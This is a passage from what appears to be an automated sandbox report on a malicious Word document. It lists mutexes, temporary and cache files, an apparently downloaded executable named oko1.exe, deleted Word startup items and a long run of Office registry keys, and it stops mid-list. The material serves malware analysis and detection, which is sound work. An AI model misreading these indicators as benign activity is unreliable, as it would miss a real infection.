804. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
805. "Global\\MsoShellExtRegAccess_S-1-5-21-0000000000-0000000000-0000000000-1000",
806. "Global\\552FFA80-3393-423d-8671-7BA046BB5906",
807. "Local\\F99C425F-9135-43ed-BD7D-396DE488DC53",
808. "A81FB8C6-0BBE6E18-6FC9B5DB-536DA455-933946726",
809. "Global\\ADAP_WMI_ENTRY",
810. "Global\\RefreshRA_Mutex",
811. "Global\\RefreshRA_Mutex_Lib",
812. "Global\\RefreshRA_Mutex_Flag"
813.  
814.  
815. * Modified Files:
816. "C:\\Users\\user\\AppData\\Local\\Temp\\wbBQQr0dX.doc",
817. "C:\\Users\\user\\AppData\\Local\\Temp\\~$BQQr0dX.doc",
818. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF379A4C55-77D3-47D1-8EFF-C1EC7619AA99.tmp",
819. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Office\\15.0\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=10",
820. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4",
821. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\6BADA8974A10C4BD62CC921D13E43B18_88614FFAD35D353421B8A7E1FE18FCE4",
822. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\37D958F0157C4E87D39A5E7FAB3AECCC_090773D7F9DBE1D85BCB60985361F32E",
823. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\37D958F0157C4E87D39A5E7FAB3AECCC_090773D7F9DBE1D85BCB60985361F32E",
824. "C:\\Users\\user\\AppData\\Local\\Temp\\Cab706.tmp",
825. "C:\\Users\\user\\AppData\\Local\\Temp\\Tar707.tmp",
826. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRSA5E5E720-84A6-465B-892E-59F5D4CE91B5.tmp",
827. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\AutoRecovery save of wbBQQr0dX.asd",
828. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRD0000.tmp",
829. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRL0001.tmp",
830. "C:\\Users\\user\\AppData\\Local\\Temp\\~DF63EED31D1354659C.TMP",
831. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC",
832. "C:\\Users\\user\\AppData\\Local\\Temp\\cab5826.tmp",
833. "C:\\Users\\user\\AppData\\Local\\Temp\\cab5827.tmp",
834. "C:\\Users\\user\\AppData\\Local\\Temp\\cab5960.tmp",
835. "C:\\Users\\user\\AppData\\Local\\Temp\\cab5DC6.tmp",
836. "C:\\Users\\user\\AppData\\Local\\Temp\\cab5DC8.tmp",
837. "C:\\Users\\user\\AppData\\Local\\Temp\\cab5DD9.tmp",
838. "C:\\Users\\user\\AppData\\Local\\Temp\\cab5DEB.tmp",
839. "C:\\Users\\user\\AppData\\Local\\Temp\\cab5DEC.tmp",
840. "C:\\Users\\user\\AppData\\Local\\Temp\\cab5DDA.tmp",
841. "C:\\Users\\user\\AppData\\Local\\Temp\\cab5E0C.tmp",
842. "C:\\Users\\user\\AppData\\Local\\Temp\\cab5DC7.tmp",
843. "C:\\Users\\user\\AppData\\Local\\Temp\\cab5ED9.tmp",
844. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4",
845. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4",
846. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA",
847. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA",
848. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S4VH3RFR\\oko1.exe",
849. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
850.  
851.  
852. * Deleted Files:
853. "C:\\Users\\user\\AppData\\Local\\Temp\\Cab706.tmp",
854. "C:\\Users\\user\\AppData\\Local\\Temp\\Tar707.tmp",
855. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Schemas\\MS Word_restart.xml",
856. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\",
857. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\AutoRecovery save of wbBQQr0dX.asd",
858. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRD0000.tmp",
859. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRL0001.tmp"
860.  
861.  
862. * Modified Registry Keys:
863. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\9q*",
864. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
865. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache",
866. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\RemoteClearDate",
867. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1",
868. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\Last",
869. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0",
870. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\FilePath",
871. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\StartDate",
872. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\EndDate",
873. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\Properties",
874. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\AllUsers\\office15client.microsoft.com\\config15--lcid=1033&syslcid=1033&uilcid=1033&build=15.0.4569&crev=1\\0\\Url",
875. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Internet\\WebServiceCache\\LastClean",
876. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingConfigurableSettings",
877. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingLastSyncTime",
878. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingLastWriteTime",
879. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ReviewCycle",
880. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ReviewCycle\\ReviewToken",
881. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\CacheReady",
882. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastRequest",
883. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery",
884. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\122462C",
885. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\122462C\\122462C",
886. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005119110000000000000000F01FEC\\Usage\\OUTLOOKFiles",
887. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Common\\Cloud Storage",
888. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ForceCacheRefresh",
889. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OnceSucceeded",
890. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastUpdate",
891. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\NextUpdate",
892. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT",
893. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Capabilities",
894. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ConnectMechanism",
895. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\IsManaged",
896. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\IsRemovable",
897. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ServiceOwner",
898. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\SortOrder",
899. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\SupportsMultiple",
900. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\CapabilitiesMetadata",
901. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Description",
902. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Name",
903. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ServiceId",
904. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\ServiceUrl",
905. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Metadata",
906. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Metadata\\KeyTip",
907. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Metadata\\Type",
908. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails",
909. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails\\Url16x16",
910. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails\\Url32x32",
911. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINT\\Thumbnails\\Url48x48",
912. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP",
913. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Capabilities",
914. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ConnectMechanism",
915. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\IsManaged",
916. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\IsRemovable",
917. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ServiceOwner",
918. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\SortOrder",
919. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\SupportsMultiple",
920. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\CapabilitiesMetadata",
921. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Description",
922. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Name",
923. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ServiceId",
924. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\ServiceUrl",
925. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Metadata",
926. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Metadata\\KeyTip",
927. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Metadata\\Type",
928. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails",
929. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails\\Url16x16",
930. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails\\Url32x32",
931. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365MOUNTED_SHAREPOINTGROUP\\Thumbnails\\Url48x48",
932. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT",
933. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Capabilities",
934. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ConnectMechanism",
935. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\IsManaged",
936. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\IsRemovable",
937. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ServiceOwner",
938. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\SortOrder",
939. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\SupportsMultiple",
940. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\CapabilitiesMetadata",
941. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Description",
942. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Name",
943. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ServiceId",
944. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\ServiceUrl",
945. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Metadata",
946. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Metadata\\KeyTip",
947. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Metadata\\Type",
948. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails",
949. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails\\Url16x16",
950. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails\\Url32x32",
951. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINT\\Thumbnails\\Url48x48",
952. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP",
953. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Capabilities",
954. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ConnectMechanism",
955. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\IsManaged",
956. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\IsRemovable",
957. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ServiceOwner",
958. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\SortOrder",
959. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\SupportsMultiple",
960. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\CapabilitiesMetadata",
961. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Description",
962. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Name",
963. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ServiceId",
964. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\ServiceUrl",
965. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Metadata",
966. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Metadata\\KeyTip",
967. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Metadata\\Type",
968. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails",
969. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails\\Url16x16",
970. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails\\Url32x32",
971. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\O365_SHAREPOINTGROUP\\Thumbnails\\Url48x48",
972. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED",
973. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Capabilities",
974. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ConnectMechanism",
975. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\IsManaged",
976. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\IsRemovable",
977. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ServiceOwner",
978. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\SortOrder",
979. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\SupportsMultiple",
980. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\CapabilitiesMetadata",
981. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Description",
982. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Name",
983. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ServiceId",
984. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\ServiceUrl",
985. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Metadata",
986. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Metadata\\KeyTip",
987. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\OFFOPTIN_DOCSTORAGE_LIMITED\\Metadata\\Type",
988. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT",
989. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Capabilities",
990. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ConnectMechanism",
991. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\IsManaged",
992. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\IsRemovable",
993. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ServiceOwner",
994. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\SortOrder",
995. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\SupportsMultiple",
996. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\CapabilitiesMetadata",
997. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Description",
998. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\Name",
999. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ServiceId",
1000. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\ONPREM_SHAREPOINT\\ServiceUrl",
